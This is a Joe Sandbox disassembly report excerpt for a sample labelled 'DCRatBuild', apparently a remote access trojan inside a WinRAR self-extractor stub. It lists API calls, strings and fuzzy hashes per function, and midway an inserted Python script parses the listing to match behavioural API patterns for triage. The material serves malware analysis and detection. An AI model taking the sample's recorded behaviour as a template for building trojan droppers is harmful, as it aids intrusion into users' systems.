                                        Similarity
                                        • API ID: MessageSend$Item$TextWindow$Dialog
                                        • String ID: LICENSEDLG
                                        • API String ID: 3214253823-2177901306
                                        • Opcode ID: 48375d1661b5ebb97badff39f25a21e5541f3fb410691ac93e3d24fd1e3d6068
                                        • Instruction ID: 687f6aa4d4005e2425a8714913824dfb131e129e3b06c854084caa99d8412a5c
                                        • Opcode Fuzzy Hash: 48375d1661b5ebb97badff39f25a21e5541f3fb410691ac93e3d24fd1e3d6068
                                        • Instruction Fuzzy Hash: 2A210732BC0104BBD2216F35EC4EE7B3B6CEB06786F018015F605924A5DB6E5902DB3A
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00739448
                                        • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0073946B
                                        • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0073948A
                                          • Part of subcall function 007417AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0073BB05,00000000,.exe,?,?,00000800,?,?,007485DF,?), ref: 007417C2
                                        • _swprintf.LIBCMT ref: 00739526
                                          • Part of subcall function 0073400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0073401D
                                        • MoveFileW.KERNEL32(?,?), ref: 00739595
                                        • MoveFileW.KERNEL32(?,?), ref: 007395D5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                        • String ID: rtmp%d
                                        • API String ID: 2111052971-3303766350
                                        • Opcode ID: 338e866f516a809e167966ab6c95ea6a17f8058ad40cabe487555bb483a00b3d
                                        • Instruction ID: 9778b6866a159d17026aaf8ba3168331d7222296ebdc1aa2de04b7d2e0f5bed6
                                        • Opcode Fuzzy Hash: 338e866f516a809e167966ab6c95ea6a17f8058ad40cabe487555bb483a00b3d
                                        • Instruction Fuzzy Hash: 10412F71901259F6EF30EB608C89ADA737CAF55380F0444E5B649E3143EBBC9B89CB65
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00748F38
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00748F59
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00748F80
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Global$AllocByteCharCreateMultiStreamWide
                                        • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                        • API String ID: 4094277203-4209811716
                                        • Opcode ID: 9398480353c8e4b7056405b7a1361a523a740efb226512037980a824a991c4ad
                                        • Instruction ID: 18c1110937fbef3fd959a430991fea2b15376652dd934f1111039d68a29c97ba
                                        • Opcode Fuzzy Hash: 9398480353c8e4b7056405b7a1361a523a740efb226512037980a824a991c4ad
                                        • Instruction Fuzzy Hash: 50314A31508319BBD724AB309C06FAF7798DF82760F044019FD12961D1EFAC9A0DC3A6
                                        APIs
                                        • GetLastError.KERNEL32(?,00770EE8,00753E14,00770EE8,?,?,00753713,00000050,?,00770EE8,00000200), ref: 00758FA9
                                        • _free.LIBCMT ref: 00758FDC
                                        • _free.LIBCMT ref: 00759004
                                        • SetLastError.KERNEL32(00000000,?,00770EE8,00000200), ref: 00759011
                                        • SetLastError.KERNEL32(00000000,?,00770EE8,00000200), ref: 0075901D
                                        • _abort.LIBCMT ref: 00759023
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID: Xv
                                        • API String ID: 3160817290-1716690856
                                        • Opcode ID: f29c8893ca22f0b2a9346b5e2672e0df8f6f75ef98c8c94853943868ad414946
                                        • Instruction ID: d24e9442e4828dc0740424d1b69f7b1736fd82a23a76145877a4eee69cf9109b
                                        • Opcode Fuzzy Hash: f29c8893ca22f0b2a9346b5e2672e0df8f6f75ef98c8c94853943868ad414946
                                        • Instruction Fuzzy Hash: D1F04935104601EBC39133286C0EBEB29169BD0333F204114FD06F61D2EFEC880E5066
                                        APIs
                                        • __aulldiv.LIBCMT ref: 00740A9D
                                          • Part of subcall function 0073ACF5: GetVersionExW.KERNEL32(?), ref: 0073AD1A
                                        • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00740AC0
                                        • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00740AD2
                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00740AE3
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00740AF3
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00740B03
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00740B3D
                                        • __aullrem.LIBCMT ref: 00740BCB
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                        • String ID:
                                        • API String ID: 1247370737-0
                                        • Opcode ID: adef66de76f3f0e95edd83a2fbdf322c2c7b9e1a22f9b51fc1e1f8f652c1c614
                                        • Instruction ID: 08f6a137060f83c01641aad02f1f425fe0a387e479e4970262522069ce04db3f
                                        • Opcode Fuzzy Hash: adef66de76f3f0e95edd83a2fbdf322c2c7b9e1a22f9b51fc1e1f8f652c1c614
                                        • Instruction Fuzzy Hash: 5E414AB1408306AFC314DF64C88496BF7F8FB88714F104A2EFA9692650E778E548CB66
                                        APIs
                                        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0075F5A2,?,00000000,?,00000000,00000000), ref: 0075EE6F
                                        • __fassign.LIBCMT ref: 0075EEEA
                                        • __fassign.LIBCMT ref: 0075EF05
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0075EF2B
                                        • WriteFile.KERNEL32(?,?,00000000,0075F5A2,00000000,?,?,?,?,?,?,?,?,?,0075F5A2,?), ref: 0075EF4A
                                        • WriteFile.KERNEL32(?,?,00000001,0075F5A2,00000000,?,?,?,?,?,?,?,?,?,0075F5A2,?), ref: 0075EF83
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        • Opcode ID: 7b72867ec5fbc7413a9e4b5983aa465a40c236b08474d19fa5875c74d58f0650
                                        • Instruction ID: c5c8e298f8a6b18204d5af8508b9d6233f9c9f5bbb0e593c302203fd0a7e2384
                                        • Opcode Fuzzy Hash: 7b72867ec5fbc7413a9e4b5983aa465a40c236b08474d19fa5875c74d58f0650
                                        • Instruction Fuzzy Hash: FA5108B0A00209DFDB14CFA8DC45AEEBBF9FF08301F14451AE955E7291EBB49A45CB64
                                        APIs
                                        • GetTempPathW.KERNEL32(00000800,?), ref: 0074C54A
                                        • _swprintf.LIBCMT ref: 0074C57E
                                          • Part of subcall function 0073400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0073401D
                                        • SetDlgItemTextW.USER32(?,00000066,0077946A), ref: 0074C59E
                                        • _wcschr.LIBVCRUNTIME ref: 0074C5D1
                                        • EndDialog.USER32(?,00000001), ref: 0074C6B2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                        • String ID: %s%s%u
                                        • API String ID: 2892007947-1360425832
                                        • Opcode ID: b78ad367cce8b74e8a2d9770de973b5288fe2e0ce2f1210bf5cb6bc44ed9bf4a
                                        • Instruction ID: 25438177c7370ff8fa140e1a4b240e1738753519e3f75141f5891fbeb72780ac
                                        • Opcode Fuzzy Hash: b78ad367cce8b74e8a2d9770de973b5288fe2e0ce2f1210bf5cb6bc44ed9bf4a
                                        • Instruction Fuzzy Hash: 0241A3B1D00658FADF26DBA4CC49EDA77BCEB08345F0080A6E609E6061E7799BC4CB55
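The "APIs" records in this listing all share one line format: `• Name.MODULE(arg,arg,...), ref: <call site>` for direct calls, and the same shape prefixed with `Part of subcall function <addr>:` for calls made one level down in a callee. That regularity makes the records easy to turn into per-function call sequences for triage. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses the two records shown above (the path-rename helper starting at 00739448 and the temp-directory dialog handler starting at 0074C54A, copied here as constructed sample input), keeps direct and nested calls apart, and matches ordered API patterns against each function. The pattern names and the `has_sequence` matcher are this example's own. One caveat the parser preserves in its comments: the argument lists are stack slots as captured by the sandbox, not the documented arity of the API, so the 16 values shown for CompareStringW must not be read as its real parameter count.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Sequence, Tuple

# Constructed sample input: two "APIs" records copied from the listing above
# (the path/rename helper at 00739448 and the dialog handler at 0074C54A),
# with the report's bullets and sub-call indentation kept as rendered.
SAMPLE_LISTING = """\
APIs
• __EH_prolog.LIBCMT ref: 00739448
• GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0073946B
• GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0073948A
  • Part of subcall function 007417AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0073BB05,00000000,.exe,?,?,00000800,?,?,007485DF,?), ref: 007417C2
• _swprintf.LIBCMT ref: 00739526
  • Part of subcall function 0073400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0073401D
• MoveFileW.KERNEL32(?,?), ref: 00739595
• MoveFileW.KERNEL32(?,?), ref: 007395D5
Strings
APIs
• GetTempPathW.KERNEL32(00000800,?), ref: 0074C54A
• _swprintf.LIBCMT ref: 0074C57E
  • Part of subcall function 0073400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0073401D
• SetDlgItemTextW.USER32(?,00000066,0077946A), ref: 0074C59E
• _wcschr.LIBVCRUNTIME ref: 0074C5D1
• EndDialog.USER32(?,00000001), ref: 0074C6B2
Strings
"""

# One call line: optional "Part of subcall function <addr>:" prefix, then
# Name.MODULE, an optional "(arg,...)" list and the "ref: <addr>" call site.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]      # stack slots as captured, not the API's documented arity
    ref: int                   # call-site address
    subcall_of: Optional[int]  # callee address when the call is nested one level down


def parse_call(line: str) -> Optional[ApiCall]:
    """Parse one bullet line; returns None for headers and other report text."""
    m = CALL_RE.match(line)
    if m is None:
        return None
    args = m.group("args")
    return ApiCall(
        name=m.group("name"),
        module=m.group("module"),
        args=tuple(args.split(",")) if args else (),
        ref=int(m.group("ref"), 16),
        subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
    )


def parse_listing(text: str) -> List[List[ApiCall]]:
    """Start a new record at each 'APIs' header and parse its call lines in order."""
    records: List[List[ApiCall]] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            records.append([])
            continue
        call = parse_call(line)
        if call is not None and records:
            records[-1].append(call)
    return records


def call_sequence(record: Sequence[ApiCall], include_subcalls: bool = False) -> List[str]:
    """API names in listing order (call-site order for direct calls); nested
    calls belong to another function and are dropped unless asked for."""
    return [c.name for c in record if include_subcalls or c.subcall_of is None]


def has_sequence(names: Sequence[str], pattern: Sequence[str]) -> bool:
    """Ordered-subsequence match (gaps allowed): the usual shape of a
    behavioural API signature such as 'resolve a path, then move a file'."""
    it = iter(names)
    return all(any(n == want for n in it) for want in pattern)


# Patterns derived from this listing's own two records; names are this example's.
RENAME_PATTERN = ("GetLongPathNameW", "GetShortPathNameW", "MoveFileW")
TEMP_DIALOG_PATTERN = ("GetTempPathW", "SetDlgItemTextW", "EndDialog")


def matching_records(records: Sequence[Sequence[ApiCall]], pattern: Sequence[str]) -> List[int]:
    """Indices of records whose direct-call sequence contains `pattern` in order."""
    return [i for i, rec in enumerate(records) if has_sequence(call_sequence(rec), pattern)]


if __name__ == "__main__":
    recs = parse_listing(SAMPLE_LISTING)
    for i, rec in enumerate(recs):
        print(i, sorted({c.module for c in rec}), call_sequence(rec))
    print("rename helper:", matching_records(recs, RENAME_PATTERN))
    print("temp-dir dialog:", matching_records(recs, TEMP_DIALOG_PATTERN))
```

Run directly, it prints each record's module set and direct-call sequence and then the record indices that match the two patterns. `matching_records` works on any number of records, so the same patterns can be run over a complete listing exported from the report; nested calls are excluded from matching on purpose, since they execute inside a different function and would otherwise attribute a callee's behaviour to every caller.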
                                        APIs
                                        • ShowWindow.USER32(?,00000000), ref: 0074964E
                                        • GetWindowRect.USER32(?,00000000), ref: 00749693
                                        • ShowWindow.USER32(?,00000005,00000000), ref: 0074972A
                                        • SetWindowTextW.USER32(?,00000000), ref: 00749732
                                        • ShowWindow.USER32(00000000,00000005), ref: 00749748
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Window$Show$RectText
                                        • String ID: RarHtmlClassName
                                        • API String ID: 3937224194-1658105358
                                        • Opcode ID: bd215700ccec2cfbc0ad088c2ca060195312e976ae2d1720794e0fb2bccc58ce
                                        • Instruction ID: e0eade996c4d0ea6961e9c01e2e01faefaf803b448c6ef7bfdb39260117f0fb7
                                        • Opcode Fuzzy Hash: bd215700ccec2cfbc0ad088c2ca060195312e976ae2d1720794e0fb2bccc58ce
                                        • Instruction Fuzzy Hash: 4531BF31044208FFCB11AF64DC4CB6B7BA8EF48311F01855AFE499A163DB38D816CBA9
                                        APIs
                                          • Part of subcall function 0075BF79: _free.LIBCMT ref: 0075BFA2
                                        • _free.LIBCMT ref: 0075C003
                                          • Part of subcall function 007584DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0075BFA7,?,00000000,?,00000000,?,0075BFCE,?,00000007,?,?,0075C3CB,?), ref: 007584F4
                                          • Part of subcall function 007584DE: GetLastError.KERNEL32(?,?,0075BFA7,?,00000000,?,00000000,?,0075BFCE,?,00000007,?,?,0075C3CB,?,?), ref: 00758506
                                        • _free.LIBCMT ref: 0075C00E
                                        • _free.LIBCMT ref: 0075C019
                                        • _free.LIBCMT ref: 0075C06D
                                        • _free.LIBCMT ref: 0075C078
                                        • _free.LIBCMT ref: 0075C083
                                        • _free.LIBCMT ref: 0075C08E
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                        • Instruction ID: fb180a45ea9de62c1a528b91924b008d9a2c8710d12f8f13f329b0319e4eabad
                                        • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                        • Instruction Fuzzy Hash: DD113071541B04FBD6A0BBB0CC0BFDBB79D6F00702F408855BA9966492DBB9F90C8A91
                                        APIs
                                        • GetLastError.KERNEL32(?,?,007520C1,0074FB12), ref: 007520D8
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007520E6
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007520FF
                                        • SetLastError.KERNEL32(00000000,?,007520C1,0074FB12), ref: 00752151
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: f413d28f4ff59e488476e40051fbf27fb3f5d68ea77363e577adb1e5b7a0e350
                                        • Instruction ID: fd0f81f41d0e195aeac78df4b2f712b9e946fe066dba2036dd3e71d9aca84043
                                        • Opcode Fuzzy Hash: f413d28f4ff59e488476e40051fbf27fb3f5d68ea77363e577adb1e5b7a0e350
                                        • Instruction Fuzzy Hash: C201283620A715EFB7552BB4BC895DB2A44EB227733204629FE10590F2FFDD4C0E9168
                                        APIs
                                        • GetLastError.KERNEL32(?,?,?,0075895F,007585FB,?,00758FD3,00000001,00000364,?,00753713,00000050,?,00770EE8,00000200), ref: 0075902E
                                        • _free.LIBCMT ref: 00759063
                                        • _free.LIBCMT ref: 0075908A
                                        • SetLastError.KERNEL32(00000000,?,00770EE8,00000200), ref: 00759097
                                        • SetLastError.KERNEL32(00000000,?,00770EE8,00000200), ref: 007590A0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        • String ID: Xv
                                        • API String ID: 3170660625-1716690856
                                        • Opcode ID: e6469545f3836dbf746b22a8575b5fad492bef8d21876564591aac9313d854d1
                                        • Instruction ID: a2b09acf1e62eeed278ea0f329c5ae457f79d78a5129a59eaa482237c1f6fd7b
                                        • Opcode Fuzzy Hash: e6469545f3836dbf746b22a8575b5fad492bef8d21876564591aac9313d854d1
                                        • Instruction Fuzzy Hash: 5201D676605702EB83212734AC899EB255E9BD13733204524FE0EA71D1EFEC8C0D4165
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                        • API String ID: 0-1718035505
                                        • Opcode ID: ebdd9fdc30dce1ba5b9e9b3d9d681758d510f8190a03a800083e5496bc38cdc8
                                        • Instruction ID: f15b0901f182723bcfc3280d8ef202990e4ef501cdb20db6dc58699690c1b33d
                                        • Opcode Fuzzy Hash: ebdd9fdc30dce1ba5b9e9b3d9d681758d510f8190a03a800083e5496bc38cdc8
                                        • Instruction Fuzzy Hash: 0001F471B513229F4F305E746CC52E62794EA42716720927BE982D3200DBADCC85EBF4
                                        APIs
                                        • _free.LIBCMT ref: 0075807E
                                          • Part of subcall function 007584DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0075BFA7,?,00000000,?,00000000,?,0075BFCE,?,00000007,?,?,0075C3CB,?), ref: 007584F4
                                          • Part of subcall function 007584DE: GetLastError.KERNEL32(?,?,0075BFA7,?,00000000,?,00000000,?,0075BFCE,?,00000007,?,?,0075C3CB,?,?), ref: 00758506
                                        • _free.LIBCMT ref: 00758090
                                        • _free.LIBCMT ref: 007580A3
                                        • _free.LIBCMT ref: 007580B4
                                        • _free.LIBCMT ref: 007580C5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID: v
                                        • API String ID: 776569668-2951754918
                                        • Opcode ID: 650c725ee64908b6677c1ec6bccacceeb6c0e301170ed0f3b411d004b3f773df
                                        • Instruction ID: 8002492d3ace47600d560382e200c0e9784f8fdaae45c48b2358d0068fcaea5e
                                        • Opcode Fuzzy Hash: 650c725ee64908b6677c1ec6bccacceeb6c0e301170ed0f3b411d004b3f773df
                                        • Instruction Fuzzy Hash: D9F067B8A02262CB87C16F15BC054853B60F714721348C28BFC15A6A70CFBD087A8FDA
                                        APIs
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00740D0D
                                          • Part of subcall function 0073ACF5: GetVersionExW.KERNEL32(?), ref: 0073AD1A
                                        • LocalFileTimeToFileTime.KERNEL32(?,00740CB8), ref: 00740D31
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00740D47
                                        • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00740D56
                                        • SystemTimeToFileTime.KERNEL32(?,00740CB8), ref: 00740D64
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00740D72
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
